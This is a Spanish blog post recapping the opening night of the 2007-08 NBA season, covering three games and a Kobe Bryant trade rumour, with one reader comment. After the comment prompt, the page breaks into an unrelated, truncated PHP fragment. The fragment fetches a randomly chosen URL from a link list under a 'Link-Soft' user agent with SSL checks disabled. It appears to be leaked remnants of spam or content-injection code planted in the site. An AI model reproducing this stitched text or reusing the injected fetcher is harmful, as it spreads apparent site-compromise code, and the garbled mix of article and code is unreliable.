La crónica (noche del 30/10/07)

31 de October de 2007 por MagicJohnson32

La NBA 2007-2008 ha arrancado esta pasada madrugada. Tres partidos y tres victorias de los favoritos es lo que nos ha deparado una noche bastante movida mediáticamente dado el rumor de inminente traspaso de Kobe Bryant con que la cadena ESPN ha envuelto toda la jornada. Finalmente Kobe no ha sido traspasado y Lakers ha contado con él en su partido contra los Rockets.

Ahí va un resumen de lo acontecido en los encuentros de esta noche inaugural de la temporada 2007-2008.

 Blazers 97 – Spurs 106

evaringLos Spurs recibieron sus anillos de campeones y, entre tanto, vencieron a los nuevos Blazers, que son menos nuevos desde que el número 1 del último draft, Oden, se lesionase para toda la temporada. El trío habitual de los Spurs, Duncan-Parker-Ginóbili, brilló como de costumbre, mientras que por los Blazers fueron Aldrige, Webster y, sorpresa, Przybilla los que mejor rendimiento ofrecieron.

La ceremonia de entrega de anillos tuvo a los locales un tanto dispersos pero las limitaciones del cuadro visitante -más aún cuando Roy hace 2 de 10 en tiros- y la gran aportación del banquillo de San Antonio -48 puntos, por 24 del banco de los Blazers- aseguraron la primera victoria para los vigentes campeones.

Jazz 117 – Warriors 96

Lo más emocionante que sucedió anoche en el Oracle Arena durante la visita de los Jazz a los Warriors fue el terremoto que afectó durante unos segundos a las instalaciones. No tuvo ninguna consecuencia y, de hecho, apenas se notó. Lo que sí quedó plausible fue la superioridad del equipo de Jerry Sloan, con unos inmensos Deron Williams y Carlos Boozer, y el añadido de Andrei Kirilenko, con su clásico partido en el que registra más de 5 en cuatro categorías estadísticas diferentes. Los 18 puntos de Brewer y los 16 de Millsap pusieron la guinda ante unos Warriors liderados por Baron Davis, con otros 4 jugadores por encima de 10 puntos pero que apenas contó con aportación desde el banquillo. Debutó Belinelli con 6 puntos (2 triples).

Rockets 95 – Lakers 93

La ESPN nos vendió la moto de un inminente traspaso de Bryant que provocaría que el #24 ni siquiera jugase ante los Rockets. Bryant jugó ante los Rockets, y lo hizo bien. Pero como suele suceder en estos Lakers, no fue suficiente. Un triple de Shane Battier a 2 segundos para la conclusión tuvo la culpa de ello después de que los locales remontasen 12 puntos en menos de 1:30 con ocho puntos de Bryant, 2 de Farmar y una canasta de Fisher pisando la línea de tres que empató el encuentro a falta de 0:13. kobestayApareció entonces Battier con su triple y posteriormente los Lakers pidieron 3 tiros libres en la falta de ex grizzly sobre Bryant. Los árbitros señalaron falta previa al lanzamiento y ahí se acabaron las esperanzas de L.A.L. La pareja de los Rockets, McGrady & Yao, sumó 55 puntos, 18 rebotes y 7 asistencias, mientras que Bryant (45 puntos, 8 rebotes, 4 asistencias y 4 robos) volvió a estar muy solo y sólo Fisher, en su regreso oficial como local al pabellón que más le quiere, anotó más de 10 puntos.

Comenta

Un comentario a esta entrada

  1. junior dice:
    #1

    Me repetiré:

    Espectacular canastón el que han conseguido entre Kwame y Walton en canasta propia. Jojojojo, y para más coña, van y pierden de 1…

    Por cierto, hoy espero leer en las crónicas que LA perdió por el egoísmo de Kobe…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>